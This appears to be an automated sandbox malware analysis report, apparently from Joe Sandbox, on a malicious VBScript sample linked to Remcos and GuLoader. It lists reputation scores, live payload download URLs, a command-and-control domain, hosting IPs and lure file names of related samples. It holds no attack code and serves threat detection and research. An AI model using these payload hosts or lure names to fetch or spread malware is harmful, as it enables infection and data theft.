                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                    https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb510%Avira URL Cloudsafe
                    https://www.google.com0%Avira URL Cloudsafe
                    http://198.46.176.13314%VirustotalBrowse
                    https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c0%Avira URL Cloudsafe
                    http://198.46.176.133/Upload/vbs.jpeg00Bj0%Avira URL Cloudsafe
                    https://www.google.com0%VirustotalBrowse
                    https://maps.windows.com/windows-app-web-link0%Avira URL Cloudsafe
                    http://198.46.176.133/Upload/vbs.jpeg70%Avira URL Cloudsafe
                    https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
                    maveing.duckdns.org100%Avira URL Cloudmalware
                    http://geoplugin.net/json.gpP0%Avira URL Cloudsafe
                    https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc80%Avira URL Cloudsafe
                    https://maps.windows.com/windows-app-web-link0%VirustotalBrowse
                    http://www.nirsoft.net/0%Avira URL Cloudsafe
                    http://www.nirsoft.net0%VirustotalBrowse
                    https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d0%Avira URL Cloudsafe
                    https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d0%Avira URL Cloudsafe
                    http://www.nirsoft.net/0%VirustotalBrowse
                    maveing.duckdns.org9%VirustotalBrowse
                    http://geoplugin.net/json.gpd0%Avira URL Cloudsafe
                    https://www.office.com/0%Avira URL Cloudsafe
                    https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a80%Avira URL Cloudsafe
                    http://198.46.176.133/Upload/vbs.jpeg100%Avira URL Cloudmalware
                    http://geoplugin.net/json.gpd0%VirustotalBrowse
                    https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf680%Avira URL Cloudsafe
                    https://www.office.com/0%VirustotalBrowse
                    https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e20%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpP0%VirustotalBrowse
                    http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
                    https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d0%Avira URL Cloudsafe
                    https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
                    https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa4370%Avira URL Cloudsafe
                    https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d7888073423260%Avira URL Cloudsafe
                    http://198.46.176.133/Upload/vbs.jpeg19%VirustotalBrowse
                    http://192.3.176.154/50/HNBC.txt100%Avira URL Cloudmalware
                    https://github.com/Pester/Pester0%Avira URL Cloudsafe
                    https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b030%Avira URL Cloudsafe
                    https://aefd.nelreports.net/api/report?cat=bingaot0%Avira URL Cloudsafe
                    https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae0%Avira URL Cloudsafe
                    https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad70%Avira URL Cloudsafe
                    https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD0%Avira URL Cloudsafe
                    https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                    https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc1749930%Avira URL Cloudsafe
                    https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
                    https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d50%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpR90%Avira URL Cloudsafe
                    https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b30%Avira URL Cloudsafe
                    https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc781350%Avira URL Cloudsafe
                    http://192.3.176.1540%Avira URL Cloudsafe
                    https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c590%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    maveing.duckdns.org
                    192.3.101.142
                    truetrueunknown
                    geoplugin.net
                    178.237.33.50
                    truefalseunknown
                    NameMaliciousAntivirus DetectionReputation
                    maveing.duckdns.orgtrue
                    • 9%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    http://198.46.176.133/Upload/vbs.jpegfalse
                    • 19%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    http://192.3.176.154/50/HNBC.txtfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://geoplugin.net/json.gpfalse
                    • URL Reputation: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.imvu.comrRegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=WbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://aefd.nelreports.net/api/report?cat=bingthbhvDE09.tmp.4.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contoso.com/Licensepowershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://geoplugin.net/json.gp7RegAsm.exe, 00000003.00000002.2929959756.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.nirsoft.netRegAsm.exe, 00000004.00000002.1746136572.00000000008F4000.00000004.00000010.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://aefd.nelreports.net/api/report?cat=bingaotakbhvDE09.tmp.4.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://deff.nelreports.net/api/report?cat=msnbhvDE09.tmp.4.drfalse
                    • URL Reputation: safe
                    unknown
                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&FrbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&FrbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://198.46.176.133powershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 14%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.comRegAsm.exe, RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://198.46.176.133/Upload/vbs.jpeg00Bjpowershell.exe, 00000001.00000002.1796467839.000001F16A425000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://geoplugin.net/json.gp/Cpowershell.exe, 00000001.00000002.1760253899.000001F162D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760253899.000001F161F90000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://maps.windows.com/windows-app-web-linkbhvDE09.tmp.4.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://198.46.176.133/Upload/vbs.jpeg7powershell.exe, 00000001.00000002.1796467839.000001F16A425000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://geoplugin.net/json.gpPRegAsm.exe, 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://contoso.com/powershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://login.yahoo.com/config/loginRegAsm.exefalse
                    • URL Reputation: safe
                    unknown
                    http://www.nirsoft.net/RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1702329614.000001F151F81000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhvDE09.tmp.4.drfalse
                    • URL Reputation: safe
                    unknown
                    http://geoplugin.net/json.gpdRegAsm.exe, 00000003.00000002.2929959756.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.office.com/bhvDE09.tmp.4.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://geoplugin.net/json.gplRegAsm.exe, 00000003.00000002.2929959756.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://aefd.nelreports.net/api/report?cat=wsbbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.1760253899.000001F161FF3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://aefd.nelreports.net/api/report?cat=bingaotbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://aefd.nelreports.net/api/report?cat=bingrmsbhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://www.google.com/accounts/serviceloginRegAsm.exefalse
                    • Avira URL Cloud: safe
                    unknown
                    https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://geoplugin.net/json.gpR9RegAsm.exe, 00000003.00000002.2929959756.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://aka.ms/pscore68powershell.exe, 00000001.00000002.1702329614.000001F151F81000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://192.3.176.154powershell.exe, 00000001.00000002.1702329614.000001F1521A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhvDE09.tmp.4.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000007.00000002.1737644075.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    192.3.176.154
                    unknownUnited States
                    36352AS-COLOCROSSINGUSfalse
                    198.46.176.133
                    unknownUnited States
                    36352AS-COLOCROSSINGUSfalse
                    178.237.33.50
                    geoplugin.netNetherlands
                    8455ATOM86-ASATOM86NLfalse
                    192.3.101.142
                    maveing.duckdns.orgUnited States
                    36352AS-COLOCROSSINGUStrue
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483433
                    Start date and time:2024-07-27 13:29:10 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 36s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:13
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:screensimplethingstohandlecream.gIF.vbs
                    Detection:MAL
                    Classification:mal100.rans.phis.troj.spyw.expl.evad.winVBS@14/7@2/4
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 156
                    • Number of non-executed functions: 298
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    07:30:00API Interceptor35x Sleep call for process: powershell.exe modified
                    07:30:36API Interceptor2654321x Sleep call for process: RegAsm.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    192.3.176.154erthings.docGet hashmaliciousRemcosBrowse
                    • 192.3.176.154/50/HNBC.txt
                    girlfrnd.docGet hashmaliciousRemcosBrowse
                    • 192.3.176.154/xampp/glo/KBV.txt
                    DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                    • 192.3.176.154/50/HNBC.txt
                    Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                    • 192.3.176.154/xampp/glo/KBV.txt
                    198.46.176.133IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    erthings.docGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    girlfrnd.docGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    042240724.xlsGet hashmaliciousRemcosBrowse
                    • 198.46.176.133/Upload/vbs.jpeg
                    178.237.33.5041DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    Shipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                    • geoplugin.net/json.gp
                    172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                    • geoplugin.net/json.gp
                    erthings.docGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    girlfrnd.docGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    maveing.duckdns.org172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • 192.3.101.142
                    erthings.docGet hashmaliciousRemcosBrowse
                    • 192.3.101.142
                    DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                    • 192.3.101.142
                    geoplugin.net41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    Shipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                    • 178.237.33.50
                    172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                    • 178.237.33.50
                    erthings.docGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    girlfrnd.docGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    AS-COLOCROSSINGUSFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 107.173.160.137
                    e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 107.173.160.137
                    file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                    • 107.173.160.137
                    jjjUC5ggb2nQMb1B6SvBkwmT.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                    • 23.94.183.150
                    WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                    • 104.168.36.68
                    172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • 192.3.101.142
                    1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • 192.210.214.9
                    IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
                    • 198.46.176.133
                    girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                    • 104.168.45.34
                    erthings.docGet hashmaliciousRemcosBrowse
                    • 192.3.101.142
                    AS-COLOCROSSINGUSFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 107.173.160.137
                    e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 107.173.160.137
                    file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                    • 107.173.160.137
                    jjjUC5ggb2nQMb1B6SvBkwmT.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                    • 23.94.183.150
                    WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                    • 104.168.36.68
                    172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • 192.3.101.142
                    1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • 192.210.214.9
                    IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
                    • 198.46.176.133
                    girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                    • 104.168.45.34
                    erthings.docGet hashmaliciousRemcosBrowse
                    • 192.3.101.142
                    ATOM86-ASATOM86NL41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    Shipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                    • 178.237.33.50
                    172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                    • 178.237.33.50
                    erthings.docGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    girlfrnd.docGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                    • 178.237.33.50
                    AS-COLOCROSSINGUSFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 107.173.160.137
                    e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    • 107.173.160.137
                    file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                    • 107.173.160.137
                    jjjUC5ggb2nQMb1B6SvBkwmT.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                    • 23.94.183.150
                    WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                    • 104.168.36.68
                    172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • 192.3.101.142
